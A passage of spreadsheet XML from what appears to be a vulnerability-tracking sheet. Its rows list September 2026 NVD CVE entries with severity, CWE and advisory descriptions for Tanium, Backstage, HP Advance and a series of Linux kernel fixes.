      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86865</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="inlineStr"/>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr"/>
      <c r="K208" s="5" t="inlineStr"/>
      <c r="L208" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr"/>
      <c r="Q208" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a SQL injection vulnerability in Asset.</t>
        </is>
      </c>
      <c r="S208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86865</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87105</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="inlineStr"/>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr"/>
      <c r="K209" s="5" t="inlineStr"/>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr"/>
      <c r="Q209" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a SQL injection vulnerability in Threat Response.</t>
        </is>
      </c>
      <c r="S209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87105</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88064</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="inlineStr"/>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr"/>
      <c r="K210" s="5" t="inlineStr"/>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr"/>
      <c r="Q210" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-20</t>
        </is>
      </c>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>Backstage is an open framework for building developer portals. Prior to 1.14.6 and from 1.15.0 until 1.15.4, the @backstage/plugin-techdocs-node package insufficiently validates mkdocs.yml supplied by an authenticated user who can register or modify a TechDocs source. Unsafe Python YAML tags, markdown_extensions names and configuration, theme options, and extra_templates values can reach the documentation generator and cause unintended code execution. The resulting impact is limited to the files, credentials, network access, and other resources available to the TechDocs backend or build container. This issue is fixed in versions 1.14.6 and 1.15.4.</t>
        </is>
      </c>
      <c r="S210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88064</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89084</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="inlineStr"/>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr"/>
      <c r="K211" s="5" t="inlineStr"/>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr"/>
      <c r="Q211" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R211" s="5" t="inlineStr">
        <is>
          <t>HP
has identified potential security vulnerabilities in the HP Advance software
that may enable elevation of privilege, remote code execution, or arbitrary
file write under certain conditions, impacting the HP Advance server hosting
the software.</t>
        </is>
      </c>
      <c r="S211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89084</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89774</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr"/>
      <c r="K212" s="5" t="inlineStr"/>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr"/>
      <c r="Q212" s="5" t="inlineStr"/>
      <c r="R212" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: SCO: hold sk properly in sco_conn_ready
sk deref in sco_conn_ready must be done either under conn-&gt;lock, or
holding a refcount, to avoid concurrent close. conn-&gt;sk and parent sk is
currently accessed without either, and without checking parent-&gt;sk_state:
    [Task 1]            [Task 2]
                        sco_sock_release
    sco_conn_ready
      sk = conn-&gt;sk
                          lock_sock(sk)
                            conn-&gt;sk = NULL
      lock_sock(sk)
                          release_sock(sk)
                          sco_sock_kill(sk)
       UAF on sk deref
and similarly for access to sco_get_sock_listen() return value.
Fix possible UAF by holding sk refcount in sco_conn_ready() and making
sco_get_sock_listen() increase refcount. Also recheck after lock_sock
that the socket is still valid.  Adjust conn-&gt;sk locking so it's
protected also by lock_sock() of the associated socket if any.</t>
        </is>
      </c>
      <c r="S212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89774</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89777</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr"/>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vfio/pci: clear vdev-&gt;msi_perm after freeing it on init failure
vfio_msi_cap_len() lazily allocates the per-device MSI permission table:
	vdev-&gt;msi_perm = kmalloc_obj(struct perm_bits, GFP_KERNEL_ACCOUNT);
	if (!vdev-&gt;msi_perm)
		return -ENOMEM;
	ret = init_pci_cap_msi_perm(vdev-&gt;msi_perm, len, flags);
	if (ret) {
		kfree(vdev-&gt;msi_perm);
		return ret;		/* vdev-&gt;msi_perm left dangling */
	}
When init_pci_cap_msi_perm() -&gt; alloc_perm_bits() fails with -ENOMEM, the
error path frees vdev-&gt;msi_perm but leaves the freed pointer stored in
it. vdev-&gt;msi_perm is not re-zeroed later because struct
vfio_pci_core_device is per-device and persists across open/close cycles,
and the vfio_config_init() error path returns without calling
vfio_config_free(). So the dangling pointer outlives the failed open.
That leads to two use-after-frees on the same device:
1. Reuse. The next vfio_config_init() sees the stale pointer at
   "if (vdev-&gt;msi_perm) return len;" and reuses the freed object. MSI
   config accesses in vfio_pci_config_rw_single() then dereference and
   call the freed perm-&gt;readfn / perm-&gt;writefn function pointers.
2. Double free. A later vfio_config_free() runs free_perm_bits() and
   kfree() on the already-freed object.
Fix it by NULLing vdev-&gt;msi_perm after the kfree(), matching the
NULL-after-free discipline already used in free_perm_bits() and
vfio_config_free().
  BUG: KASAN: slab-use-after-free in vfio_pci_config_rw_single (drivers/vfio/pci/vfio_pci_config.c:1961)
  Read of size 8 at addr ffff88800fcc88d0 by task exploit/143
  Call Trace:
   ...
   kasan_report (mm/kasan/report.c:595)
   vfio_pci_config_rw_single (drivers/vfio/pci/vfio_pci_config.c:1961)
   vfio_pci_config_rw (drivers/vfio/pci/vfio_pci_config.c:1986)
   vfio_pci_rw (drivers/vfio/pci/vfio_pci_core.c:1599)
   vfs_read (fs/read_write.c:572)
   __x64_sys_pread64 (fs/read_write.c:764)
   do_syscall_64 (arch/x86/entry/syscall_64.c:94)
   ...
Followed on device close by a double free of the same object:
  Oops: general protection fault, probably for non-canonical address
    0x1f63e0e8000008: 0000 [#1] SMP KASAN NOPTI
  RIP: 0010:kfree (mm/slub.c:6711)
  Call Trace:
   vfio_config_free (drivers/vfio/pci/vfio_pci_config.c:1861)
   vfio_pci_core_disable (drivers/vfio/pci/vfio_pci_core.c:685)
   vfio_pci_core_close_device (drivers/vfio/pci/vfio_pci_core.c:777)
   vfio_df_close (drivers/vfio/vfio_main.c:602)
   vfio_device_fops_release (drivers/vfio/vfio_main.c:648)
   __fput (fs/file_table.c:512)
   __x64_sys_close (fs/open.c:1496)
   do_syscall_64 (arch/x86/entry/syscall_64.c:94)
   ...
  Kernel panic - not syncing: Fatal exception</t>
        </is>
      </c>
      <c r="S213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89777</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89804</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="inlineStr"/>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr"/>
      <c r="K214" s="5" t="inlineStr"/>
      <c r="L214" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr"/>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/nouveau/dmem: fix mismatched DMA unmap size for large folios
Device-private THP migration maps migration buffers with page_size()
and records that length in dma_info-&gt;size.  For a compound folio
page_size() is PAGE_SIZE &lt;&lt; order, but two teardown sites still pass a
literal PAGE_SIZE to dma_unmap_page():
  - nouveau_dmem_migrate_to_ram() on the success path, and
  - nouveau_dmem_migrate_copy_one() on the copy-error path.
For an order &gt; 0 folio this unmaps less than was mapped, leaking the
remainder of the IOMMU/IOVA mapping.  The other unmap sites, in
nouveau_dmem_migrate_chunk() and nouveau_dmem_evict_chunk(), already
use the saved size; use it here too.</t>
        </is>
      </c>
      <c r="S214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89804</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89811</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="inlineStr"/>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr"/>
      <c r="K215" s="5" t="inlineStr"/>
      <c r="L215" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr"/>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdkfd: Add TLB flush after MES queue eviction/suspension
MES (Micro Engine Scheduler) does not perform heavy-weight TLB
invalidation after unmapping queues, unlike HWS which does this
automatically. This causes a race condition where in-flight DMA
descriptors can access memory that has been unmapped, leading to page
faults and GPU queue hangs during SVM page migration.
The issue manifests as KFDSVMRangeTest.MultiThreadMigrationTest
failures on gfx1151 (Strix Point) with XNACK mode 1 enabled - the GPU
compute queue hangs with packets submitted but never consumed.
Add kfd_flush_tlb() calls after MES queue removal in two locations:
- evict_process_queues_cpsch(): after all queues removed during eviction
- suspend_queues(): after debug/criu queue suspension (with mem_fence barrier)
This ensures all in-flight memory accesses from unmapped queues are
flushed before memory is freed or migrated.
(cherry picked from commit f5c4f88e0f9c45a8fb9dfac0c1df726c95e41b77)</t>
        </is>
      </c>
      <c r="S215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89811</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89844</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="inlineStr"/>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr"/>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr"/>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Hold vport_slock for host map update in report ID acquisition
qla24xx_report_id_acquisition() format-1 handling drops vport_slock after
taking the vport reference and then calls qla_update_host_map() without
the lock. That reaches qla_update_vp_map(), which mutates the ha-&gt;host_map
btree via btree_insert32()/btree_update32()/btree_remove32() and is
documented to require vport_slock to be held by the caller. Running it
unlocked can race concurrent host_map updates and corrupt the btree.
The format-2 path in the same function already wraps its host_map update
(SET_AL_PA) in vport_slock; the format-1 path is the lone outlier.
Hold vport_slock across the format-1 qla_update_host_map() call to honor
the documented locking contract. The vref_count taken in the loop keeps
the vport valid, so this only adds the missing host_map serialization.</t>
        </is>
      </c>
      <c r="S216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89844</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89849</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="inlineStr"/>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr"/>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr"/>
      <c r="Q217" s="5" t="inlineStr"/>
      <c r="R217" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Reject non-SCSI SRB on status IOCB fast path
qla2x00_status_entry() filters out non-TYPE_SRB entries and the
SRB_NVME_CMD, SRB_BIDI_CMD and SRB_TM_CMD types, then falls through to a
SCSI fast path that assumes the command is an SRB_SCSI_CMD. The first
thing on that path, qla_chk_edif_rx_sa_delete_pending(), and the
subsequent handling both evaluate GET_CMD_SP(sp), i.e. sp-&gt;u.scmd.cmd.
The srb u union overlays the SCSI command pointer with other command
layouts (bsg_job, iocb_cmd). If firmware delivers an unexpected
STATUS_TYPE IOCB for a non-SCSI handle, sp-&gt;u.scmd.cmd can read as a
non-NULL garbage pointer, bypassing the NULL checks in
qla_chk_edif_rx_sa_delete_pending() and at the cp == NULL test, and
leading to a wild pointer dereference.
Reject any SRB whose type is not SRB_SCSI_CMD before entering the fast
path. The outstanding_cmds slot is left untouched so a genuinely
non-SCSI command still completes through its proper handler.</t>
        </is>
      </c>
      <c r="S217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89849</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89860</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="inlineStr"/>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr"/>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr"/>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Initialize NVMe abort_work once at submission
qla_nvme_fcp_abort() and qla_nvme_ls_abort() ran INIT_WORK() on
priv-&gt;abort_work immediately before schedule_work(). INIT_WORK()
reinitializes the work_struct, resetting its list head and clearing the
pending bit. If an abort is issued more than once for the same command
(for example, concurrent transport teardown and a timeout-driven abort),
the second INIT_WORK() reinitializes a work item that is already queued,
which can corrupt the workqueue list and lead to crashes or a looping
worker.
Initialize priv-&gt;abort_work once at command submission, next to the
existing per-command spin_lock_init(&amp;priv-&gt;cmd_lock), and leave only
schedule_work() in the abort paths. schedule_work() already does nothing
when the work item is still pending, so a repeated abort no longer
disturbs an in-flight work item. The command is not returned to the
transport until the final kref_put()/release callback runs after
abort_work has completed, so the work item is idle before priv is reused
and the single submission-time INIT_WORK() is safe.</t>
        </is>
      </c>
      <c r="S218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89860</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89898</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="inlineStr"/>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr"/>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: cec: extron-da-hd-4k-plus: add sanity check
Add check to prevent overflowing msg.msg[] in case the incoming data
is malformed.</t>
        </is>
      </c>
      <c r="S219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89898</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89907</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="inlineStr"/>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr"/>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr"/>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
LoongArch: KVM: Validate MSI data before routing it to EIOINTC
pch_msi_set_irq() passes e-&gt;msi.data straight into eiointc_set_irq() as
the irq number. The MSI data comes from userspace, that either via a
KVM_IRQ_ROUTING_MSI entry set with KVM_SET_GSI_ROUTING (used by irqfd
and KVM_IRQ_LINE) or directly via KVM_SIGNAL_MSI, and is never checked
against EIOINTC_IRQS.
eiointc_set_irq() uses the value with __set_bit()/__clear_bit() on the
256-bit isr bitmap, eiointc_update_irq() then indexes sw_coremap[] and
the per-cpu coreisr/sw_coreisr bitmaps with it. Therefore a data value
&gt;= 256 reads and writes memory past the end of those arrays, i.e. any
process holding a VM fd can corrupt kernel memory beyond the allocation
of loongarch_eiointc.
Reject MSI data that doesn't fit in the EIOINTC irq space. The DMSINTC
path is unaffected as it decodes the vector from the address and masks
it.</t>
        </is>
      </c>
      <c r="S220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89907</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89908</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="inlineStr"/>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr"/>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
LoongArch: KVM: Preserve memslot arch flags on KVM_MR_FLAGS_ONLY
